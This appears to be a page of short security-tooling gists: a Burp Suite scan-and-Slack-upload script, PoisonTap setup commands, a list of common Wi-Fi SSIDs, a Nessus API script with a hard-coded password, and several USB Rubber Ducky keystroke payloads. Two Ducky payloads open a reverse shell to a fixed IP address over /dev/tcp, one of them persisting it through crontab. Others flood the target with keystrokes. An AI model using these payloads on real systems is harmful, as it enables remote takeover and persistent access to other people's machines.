This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/sh | |
java -jar -Xmx2g -Djava.awt.headless=true ~/BurpSuitePro/burpsuite_pro.jar http jerrygamblin.com 80 | |
cp *.html ~/BurpSuitePro/scan.html | |
wkhtmltopdf scan.html scan.pdf | |
curl -F [email protected] -F initial_comment="BurpProxy JerryGamblin.com Scan" -F channels=#burpreports -F token=(Your Token) https://slack.com/api/files.upload | |
rm *.html | |
rm *.pdf |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
##Server: | |
sudo apt-get update && apt-get upgrade | |
sudo apt-get install screen nodejs nodejs-legacy git npm | |
sudo npm install websocket | |
git clone https://github.com/samyk/poisontap | |
screen | |
sudo node backend_server.js | |
##piZero: | |
sudo apt-get update && apt-get upgrade |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
ssid | |
xfinitywifi | |
linksys | |
<no ssid> | |
BTWiFi-with-FON | |
NETGEAR | |
Ziggo | |
dlink | |
BTWifi-X | |
default |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
DELAY 3000 | |
GUI SPACE | |
DELAY 500 | |
STRING TextWrangler | |
DELAY 500 | |
ENTER | |
DELAY 750 | |
STRING Hello World!!! | |
ENTER |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
DELAY 2000 | |
GUI SPACE | |
DELAY 500 | |
STRING Terminal | |
DELAY 500 | |
ENTER | |
DELAY 500 | |
STRING (crontab -l ; echo "* * * * * bash -i >& /dev/tcp/192.241.157.75/443 0>&1")| crontab - | |
ENTER | |
DELAY 500 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
DELAY 2000 | |
GUI SPACE | |
DELAY 500 | |
STRING Terminal | |
DELAY 500 | |
ENTER | |
DELAY 500 | |
STRING bash -i >& /dev/tcp/192.241.157.75/443 0>&1 & | |
DELAY 500 | |
ENTER |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
DELAY 2000 | |
GUI H | |
REPEAT 100000 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
DELAY 2000 | |
STRING Rindfleischetikettierungsueberwachungsaufgabenuebertragungsgesetz | |
REPEAT 100000 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
from securitycenter import SecurityCenter5 | |
import subprocess | |
def vulns(): | |
sc = SecurityCenter5('nessus') | |
sc.login('nessusapi', 'Afinepassword!') | |
response = sc.get('status') | |
hosts = sc.analysis(tool='sumip', page=0, page_size=10, sortDir='desc',sortField='score') |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
## Update & Install Mate Desktop ## | |
apt-get update && sudo apt-get dist-upgrade -y | |
apt-get install --no-install-recommends git mate-core mate-desktop -y | |
apt-get install mate-core mate-desktop-environment mate-notification-daemon xrdp iceweasel -y | |
echo mate-session> ~/.xsession | |
cp /home/pi/.xsession /etc/skel | |
## Install Katoolin ## |